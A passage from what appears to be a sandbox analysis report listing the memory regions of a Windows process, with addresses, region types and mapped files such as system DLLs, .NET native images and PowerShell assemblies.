"\\Windows\\SysWOW64\\userenv.dll" (normalized: "c:\\windows\\syswow64\\userenv.dll") Region: id = 439 start_va = 0x74e00000 end_va = 0x74e0afff entry_point = 0x74e01992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 440 start_va = 0x140000 end_va = 0x141fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 441 start_va = 0x190000 end_va = 0x190fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 442 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 443 start_va = 0x2080000 end_va = 0x234efff entry_point = 0x2080000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 444 start_va = 0x74e10000 end_va = 0x74fadfff entry_point = 0x74e3e6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 445 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 446 start_va = 0x280000 end_va = 0x2bffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 447 start_va = 0x74950000 end_va = 0x74a44fff entry_point = 0x74950000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 448 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 449 start_va = 0x75220000 end_va = 0x75231fff entry_point = 0x75220000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\SysWOW64\\devobj.dll" (normalized: "c:\\windows\\syswow64\\devobj.dll") Region: id = 450 start_va = 0x754b0000 end_va = 0x754d6fff entry_point = 0x754b0000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 451 start_va = 0x76f60000 end_va = 0x770fcfff entry_point = 0x76f60000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\SysWOW64\\setupapi.dll" (normalized: "c:\\windows\\syswow64\\setupapi.dll") Region: id = 452 start_va = 0x2350000 end_va = 0x2742fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002350000" filename = "" Region: id = 453 start_va = 0x74dd0000 end_va = 0x74df0fff entry_point = 0x74dd145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 454 start_va = 0x76ce0000 end_va = 0x76d24fff entry_point = 0x76ce11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\SysWOW64\\Wldap32.dll" (normalized: "c:\\windows\\syswow64\\wldap32.dll") Region: id = 455 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000200000" filename = "" Region: id = 456 start_va = 0x340000 end_va = 0x36ffff entry_point = 0x340000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db" filename = "\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000010.db" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000010.db") Region: id = 457 start_va = 0x1e80000 end_va = 0x1ebffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 458 start_va = 0x2880000 end_va = 0x28bffff entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 459 start_va = 0x74900000 end_va = 0x7494bfff entry_point = 0x74900000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 460 start_va = 0x7efd5000 end_va = 0x7efd7fff entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 461 start_va = 0x748d0000 end_va = 0x748fdfff entry_point = 0x748d0000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\SysWOW64\\shdocvw.dll" (normalized: "c:\\windows\\syswow64\\shdocvw.dll") Region: id = 462 start_va = 0x74b40000 end_va = 0x74b48fff entry_point = 0x74b40000 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\SysWOW64\\linkinfo.dll" (normalized: "c:\\windows\\syswow64\\linkinfo.dll") Region: id = 463 start_va = 0x74860000 end_va = 0x748cffff entry_point = 0x74860000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\SysWOW64\\ntshrui.dll" (normalized: "c:\\windows\\syswow64\\ntshrui.dll") Region: id = 464 start_va = 0x74840000 end_va = 0x74858fff entry_point = 0x74840000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 465 start_va = 0x2790000 end_va = 0x27cffff entry_point = 0x0 region_type = private name = "private_0x0000000002790000" filename = "" Region: id = 466 start_va = 0x2950000 end_va = 0x298ffff entry_point = 0x0 region_type = private name = "private_0x0000000002950000" filename = "" Region: id = 467 start_va = 0x74830000 end_va = 0x7483afff entry_point = 0x74830000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\SysWOW64\\cscapi.dll" (normalized: "c:\\windows\\syswow64\\cscapi.dll") Region: id = 468 start_va = 0x7efad000 end_va = 0x7efaffff entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 469 start_va = 0x74820000 end_va = 0x74829fff entry_point = 0x74820000 region_type = mapped_file name = "slc.dll" filename = "\\Windows\\SysWOW64\\slc.dll" (normalized: "c:\\windows\\syswow64\\slc.dll") Region: id = 470 start_va = 0x74800000 end_va = 0x74815fff entry_point = 0x74800000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 471 start_va = 0x747c0000 end_va = 0x747fafff entry_point = 0x747c0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 472 start_va = 0x74740000 end_va = 0x747b7fff entry_point = 0x74740000 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 473 start_va = 0x74c20000 end_va = 0x74c28fff entry_point = 0x74c21220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 474 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 475 start_va = 0x1ee0000 end_va = 0x1f1ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 476 start_va = 0x740f0000 end_va = 0x7418afff entry_point = 0x740f0000 region_type = mapped_file name = "msvcr80.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_d09154e044272b9a\\msvcr80.dll") Region: id = 477 start_va = 0x74190000 end_va = 0x7473afff entry_point = 0x74190000 region_type = mapped_file name = "mscorwks.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorwks.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorwks.dll") Region: id = 478 start_va = 0x210000 end_va = 0x210fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 479 start_va = 0x260000 end_va = 0x260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 480 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 481 start_va = 0x2c0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 482 start_va = 0x2d0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 483 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 484 start_va = 0x370000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 485 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 486 start_va = 0x2800000 end_va = 0x283ffff entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 487 start_va = 0x2870000 end_va = 0x287ffff entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 488 start_va = 0x28d0000 end_va = 0x290ffff entry_point = 0x0 region_type = private name = "private_0x00000000028d0000" filename = "" Region: id = 489 start_va = 0x2990000 end_va = 0x2a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000002990000" filename = "" Region: id = 490 start_va = 0x2b10000 end_va = 0x2b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b10000" filename = "" Region: id = 491 start_va = 0x2b50000 end_va = 0x4b4ffff entry_point = 0x0 region_type = private name = "private_0x0000000002b50000" filename = "" Region: id = 492 start_va = 0x4b50000 end_va = 0x4beffff entry_point = 0x0 region_type = private name = "private_0x0000000004b50000" filename = "" Region: id = 493 start_va = 0x4d40000 end_va = 0x4d7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004d40000" filename = "" Region: id = 494 start_va = 0x72930000 end_va = 0x73427fff entry_point = 0x72930000 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\mscorlib\\62a0b3e4b40ec0e8c5cfaa0c8848e64a\\mscorlib.ni.dll") Region: id = 495 start_va = 0x7efa7000 end_va = 0x7efa9fff entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 496 start_va = 0x7efaa000 end_va = 0x7efacfff entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 497 start_va = 0x510000 end_va = 0x51ffff entry_point = 0x0 region_type = private name = "private_0x0000000000510000" filename = "" Region: id = 498 start_va = 0x4d80000 end_va = 0x5061fff entry_point = 0x4d80000 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 499 start_va = 0x72190000 end_va = 0x7292bfff entry_point = 0x72190000 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System\\9e0a3b9b9f457233a335d7fba8f95419\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system\\9e0a3b9b9f457233a335d7fba8f95419\\system.ni.dll") Region: id = 500 start_va = 0x74060000 end_va = 0x740e0fff entry_point = 0x74060000 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\b1c511d8fad78ad3c5213b2b4fb02b8b\\microsoft.powershell.consolehost.ni.dll") Region: id = 501 start_va = 0x71910000 end_va = 0x72189fff entry_point = 0x71910000 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\4436815b432c313255af322f4ec3560d\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management.a#\\4436815b432c313255af322f4ec3560d\\system.management.automation.ni.dll") Region: id = 502 start_va = 0x73d70000 end_va = 0x74051fff entry_point = 0x73ffec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 503 start_va = 0x73d70000 end_va = 0x74051fff entry_point = 0x73ffec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 504 start_va = 0x520000 end_va = 0x522fff entry_point = 0x520000 region_type = mapped_file name = "l_intl.nls" filename = "\\Windows\\SysWOW64\\l_intl.nls" (normalized: "c:\\windows\\syswow64\\l_intl.nls") Region: id = 505 start_va = 0x4bf0000 end_va = 0x4caffff entry_point = 0x4bf0000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 506 start_va = 0x75370000 end_va = 0x75374fff entry_point = 0x75370000 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 507 start_va = 0x530000 end_va = 0x530fff entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 508 start_va = 0x1e60000 end_va = 0x1e64fff entry_point = 0x1e60000 region_type = mapped_file name = "sorttbls.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sorttbls.nlp") Region: id = 509 start_va = 0x2a90000 end_va = 0x2ad0fff entry_point = 0x2a90000 region_type = mapped_file name = "sortkey.nlp" filename = "\\Windows\\assembly\\GAC_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp" (normalized: "c:\\windows\\assembly\\gac_32\\mscorlib\\2.0.0.0__b77a5c561934e089\\sortkey.nlp") Region: id = 510 start_va = 0x73d70000 end_va = 0x74051fff entry_point = 0x73ffec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 511 start_va = 0x73d70000 end_va = 0x74051fff entry_point = 0x73ffec1e region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 512 start_va = 0x1e70000 end_va = 0x1e77fff entry_point = 0x1e70000 region_type = mapped_file name = "microsoft.wsman.runtime.dll" filename = "\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Runtime\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Runtime.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\microsoft.wsman.runtime\\1.0.0.0__31bf3856ad364e35\\microsoft.wsman.runtime.dll") Region: id = 513 start_va = 0x1ec0000 end_va = 0x1ec0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ec0000" filename = "" Region: id = 514 start_va = 0x4cb0000 end_va = 0x4cf2fff entry_point = 0x4cb0000 region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 515 start_va = 0x67aa0000 end_va = 0x67ae2fff entry_point = 0x67adf03c region_type = mapped_file name = "system.transactions.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.transactions\\2.0.0.0__b77a5c561934e089\\system.transactions.dll") Region: id = 516 start_va = 0x735d0000 end_va = 0x7366bfff entry_point = 0x735d0000 region_type = mapped_file name = "system.transactions.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Transactions\\ad18f93fc713db2c4b29b25116c13bd8\\System.Transactions.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.transactions\\ad18f93fc713db2c4b29b25116c13bd8\\system.transactions.ni.dll") Region: id = 517 start_va = 0x73670000 end_va = 0x738a4fff entry_point = 0x73670000 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Core\\fbc05b5b05dc6366b02b8e2f77d080f1\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.core\\fbc05b5b05dc6366b02b8e2f77d080f1\\system.core.ni.dll") Region: id = 518 start_va = 0x73990000 end_va = 0x73a14fff entry_point = 0x73990000 region_type = mapped_file name = "microsoft.wsman.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.WSMan.Man#\\ee28a075665b6bc23b6dae56903d431d\\Microsoft.WSMan.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.wsman.man#\\ee28a075665b6bc23b6dae56903d431d\\microsoft.wsman.management.ni.dll") Region: id = 519 start_va = 0x73a20000 end_va = 0x73a6afff entry_point = 0x73a20000 region_type = mapped_file name = "microsoft.powershell.commands.diagnostics.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\4f68cd04686e5dc5a55070d112d44bdf\\Microsoft.PowerShell.Commands.Diagnostics.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\4f68cd04686e5dc5a55070d112d44bdf\\microsoft.powershell.commands.diagnostics.ni.dll") Region: id = 520 start_va = 0x748d0000 end_va = 0x748f4fff entry_point = 0x748d0000 region_type = mapped_file name = "system.configuration.install.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Configuratio#\\f02737c83305687a68c088927a6c5a98\\System.Configuration.Install.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.configuratio#\\f02737c83305687a68c088927a6c5a98\\system.configuration.install.ni.dll") Region: id = 521 start_va = 0x1ed0000 end_va = 0x1ed0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 522 start_va = 0x60340000 end_va = 0x60347fff entry_point = 0x60340000 region_type = mapped_file name = "culture.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Culture.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\culture.dll") Region: id = 523 start_va = 0x71770000 end_va = 0x7190dfff entry_point = 0x71770000 region_type = mapped_file name = "microsoft.powershell.commands.utility.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\3008a05e2928e2c1d856cc34e0422c17\\Microsoft.PowerShell.Commands.Utility.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\3008a05e2928e2c1d856cc34e0422c17\\microsoft.powershell.commands.utility.ni.dll") Region: id = 524 start_va = 0x73500000 end_va = 0x735c2fff entry_point = 0x73500000 region_type = mapped_file name = "microsoft.powershell.commands.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\8df695fb80187f65208d87229e81e8a2\\Microsoft.PowerShell.Commands.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\8df695fb80187f65208d87229e81e8a2\\microsoft.powershell.commands.management.ni.dll") Region: id = 525 start_va = 0x73b10000 end_va = 0x73b3cfff entry_point = 0x73b10000 region_type = mapped_file name = "microsoft.powershell.security.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\Microsoft.PowerShel#\\8ce205027e30804d1b2deaffa0582735\\Microsoft.PowerShell.Security.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\microsoft.powershel#\\8ce205027e30804d1b2deaffa0582735\\microsoft.powershell.security.ni.dll") Region: id = 526 start_va = 0x1ed0000 end_va = 0x1edffff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 527 start_va = 0x5070000 end_va = 0x50c3fff entry_point = 0x5070000 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorrc.dll") Region: id = 528 start_va = 0x71000000 end_va = 0x71113fff entry_point = 0x71000000 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.DirectorySer#\\45ec12795950a7d54691591c615a9e3c\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.directoryser#\\45ec12795950a7d54691591c615a9e3c\\system.directoryservices.ni.dll") Region: id = 529 start_va = 0x71120000 end_va = 0x71223fff entry_point = 0x71120000 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.management\\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\\system.management.ni.dll") Region: id = 530 start_va = 0x71230000 end_va = 0x71765fff entry_point = 0x71230000 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.xml\\461d3b6b3f43e6fbe6c897d5936e17e4\\system.xml.ni.dll") Region: id = 531 start_va = 0x73d50000 end_va = 0x73d54fff entry_point = 0x73d50000 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 532 start_va = 0x1f20000 end_va = 0x1f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f20000" filename = "" Region: id = 533 start_va = 0x2020000 end_va = 0x2030fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002020000" filename = "" Region: id = 534 start_va = 0x2750000 end_va = 0x275ffff entry_point = 0x0 region_type = private name = "private_0x0000000002750000" filename = "" Region: id = 535 start_va = 0x2760000 end_va = 0x276ffff entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 536 start_va = 0x2770000 end_va = 0x277ffff entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 537 start_va = 0x2780000 end_va = 0x278ffff entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 538 start_va = 0x27d0000 end_va = 0x27dffff entry_point = 0x0 region_type = private name = "private_0x00000000027d0000" filename = "" Region: id = 539 start_va = 0x27e0000 end_va = 0x27effff entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 540 start_va = 0x27f0000 end_va = 0x27fffff entry_point = 0x0 region_type = private name = "private_0x00000000027f0000" filename = "" Region: id = 541 start_va = 0x73d40000 end_va = 0x73d47fff entry_point = 0x73d40000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 542 start_va = 0x50d0000 end_va = 0x514ffff entry_point = 0x0 region_type = private name = "private_0x00000000050d0000" filename = "" Region: id = 543 start_va = 0x2840000 end_va = 0x284ffff entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 544 start_va = 0x2850000 end_va = 0x2850fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002850000" filename = "" Region: id = 545 start_va = 0x5150000 end_va = 0x5421fff entry_point = 0x5150000 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 546 start_va = 0x64e70000 end_va = 0x65141fff entry_point = 0x6511b43c region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\assembly\\GAC_32\\System.Data\\2.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\assembly\\gac_32\\system.data\\2.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 547 start_va = 0x709a0000 end_va = 0x70ff0fff entry_point = 0x709a0000 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Data\\1e85062785e286cd9eae9c26d2c61f73\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v2.0.50727_32\\system.data\\1e85062785e286cd9eae9c26d2c61f73\\system.data.ni.dll") Region: id = 548 start_va = 0x75380000 end_va = 0x753b4fff entry_point = 0x7538145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 549 start_va = 0x768e0000 end_va = 0x769fcfff entry_point = 0x768e158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 550 start_va = 0x76bd0000 end_va = 0x76bd5fff entry_point = 0x76bd1782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 551 start_va = 0x77530000 end_va = 0x7753bfff entry_point = 0x7753238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 552 start_va = 0x2860000 end_va = 0x286ffff entry_point = 0x0 region_type = private name = "private_0x0000000002860000" filename = "" Region: id = 553 start_va = 0x28c0000 end_va = 0x28c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000028c0000" filename = "" Region: id = 554 start_va = 0x73930000 end_va = 0x7398afff entry_point = 0x73930000 region_type = mapped_file name = "mscorjit.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v2.0.50727\\mscorjit.dll") Region: id = 555 start_va = 0x2910000 end_va = 0x291ffff entry_point = 0x0 region_type = private name = "private_0x0000000002910000" filename = "" Region: id = 556 start_va = 0x2920000 end_va = 0x292ffff entry_point = 0x0 region_type = private name = "private_0x0000000002920000" filename = "" Region: id = 557 start_va = 0x2930000 end_va = 0x293ffff entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Region: id = 558 start_va = 0x2940000 end_va = 0x294ffff entry_point = 0x0 region_type = private name = "private_0x0000000002940000" filename = "" Region: id = 559 start_va = 0x5430000 end_va = 0x552ffff entry_point = 0x0 region_type = private name = "private_0x0000000005430000" filename = "" Region: id = 560 start_va = 0x5600000 end_va = 0x563ffff entry_point = 0x0 region_type = private name = "private_0x0000000005600000" filename = "" Region: id = 561 start_va = 0x56a0000 end_va = 0x602ffff entry_point = 0x0 region_type = private name = "private_0x00000000056a0000" filename = "" Region: id = 562 start_va = 0x7efa4000 end_va = 0x7efa6fff entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" 